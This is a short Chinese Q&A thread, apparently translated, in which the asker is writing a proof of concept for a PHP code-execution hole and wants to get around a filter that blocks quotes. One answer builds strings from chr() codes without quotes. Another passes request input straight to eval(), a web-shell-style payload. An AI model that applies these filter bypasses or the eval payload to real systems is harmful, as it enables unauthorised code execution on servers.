我正在写一个PHP代码执行漏洞的POC,但我有一个我无法绕过的过滤器,只是我可以执行任何功能而不使用引号" ' `。
我尝试执行一些代码,例如dirscan(getcwd())和phpinfo(),但它确实有效
但是我找不到任何用它来编码和解码数字的函数
使用字符串或任何其他方式来使用$_REQUEST和$_SERVER vars
有旧的base64_decode,但它也需要引用。
所以想要执行我想要的任何代码吗?
答案 0 :(得分:0)
以下代码可以生成不使用任何引号的字符串:
$array = [ 0x48, 0x45, 0x4c, 0x4c, 0x4f ];
$string = array_reduce($array, function ($a, $b) { return $a . chr($b); });
echo $string; // Prints "HELLO"
答案 1 :(得分:0)
使用带有输入的表单:
<input type=text name=1>
然后PHP脚本可以执行:
eval($_REQUEST[1]);